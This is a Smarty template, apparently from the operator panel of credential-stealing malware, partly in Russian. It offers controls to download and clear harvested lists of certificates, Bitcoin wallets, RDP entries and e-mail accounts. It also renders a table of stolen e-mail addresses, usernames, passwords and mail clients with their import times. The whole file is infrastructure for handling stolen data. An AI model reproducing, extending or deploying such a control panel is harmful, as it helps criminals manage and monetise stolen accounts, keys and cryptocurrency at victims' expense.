{if $show_other_to_users || $priv_is_admin}
{assign var='no_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=other"}
{if {$smarty.request.routine|default:''} == 'confirm_clear_cert'}
{assign var='msg' value="Are you sure you want to clear the list of certificates?"}
{assign var='yes_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=other&routine=clear_cert"}
{include file='confirm.tpl'}
{/if}
{if {$smarty.request.routine|default:''} == 'confirm_clear_wallet'}
{assign var='msg' value="Are you sure you want to clear the list of purses?"}
{assign var='yes_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=other&routine=clear_wallet"}
{include file='confirm.tpl'}
{/if}
{if {$smarty.request.routine|default:''} == 'confirm_clear_email'}
{assign var='msg' value="Are you sure you want to clear the E-mail list?"}
{assign var='yes_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=other&routine=clear_email"}
{include file='confirm.tpl'}
{/if}
{if {$smarty.request.routine|default:''} == 'confirm_clear_rdp'}
{assign var='msg' value="Are you sure you want to clear the RDP list?"}
{assign var='yes_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=other&routine=clear_rdp"}
{include file='confirm.tpl'}
{/if}
{if $enable_email_mode && ($show_email_to_users || $priv_is_admin)}
Download list E-mail ({$total_email_items_count} {$total_email_items_count|items})
Download list E-mail (SMTP only) ({$total_email_smtp_items_count} {$total_email_smtp_items_count|items})
{/if}
Download Certificates ({$total_cert_items_count} {$total_cert_items_count|items}{if isset($cert_last_import)}, последний получен {$cert_last_import}{/if})
Download Bitcoin Wallets ({$total_wallet_items_count} {$total_wallet_items_count|items}{if isset($wallet_last_import)}, последний получен {$wallet_last_import}{/if})
Download RDP list ({$total_rdp_items_count} {$total_rdp_items_count|items})
{if $priv_can_delete}
{if $enable_email_mode && ($show_email_to_users || $priv_is_admin)}
Clear list E-mail ({$total_email_table_size|file_size})
{/if}
Delete certificates ({$total_cert_table_size|file_size})
Delete Bitcoin Wallets ({$total_wallet_table_size|file_size})
Clear the RDP list
{/if}
{if $enable_email_mode && ($show_email_to_users || $priv_is_admin)}
{if count($email_list)}
| E-mail address | User | Password | E-mail client | Add time | |||
|---|---|---|---|---|---|---|---|
| {else} | {/if} {$email_item.email|truncate:30:'...':true:false} | {if strlen($email_item.user) < 13}{else} | {/if} {$email_item.user|truncate:13:'...':true:false} | {if strlen($email_item.pass) < 13}{else} | {/if} {$email_item.pass|truncate:13:'...':true:false} | {$img_url nofilter}{$email_item.email_client} | {$email_item.import_time} |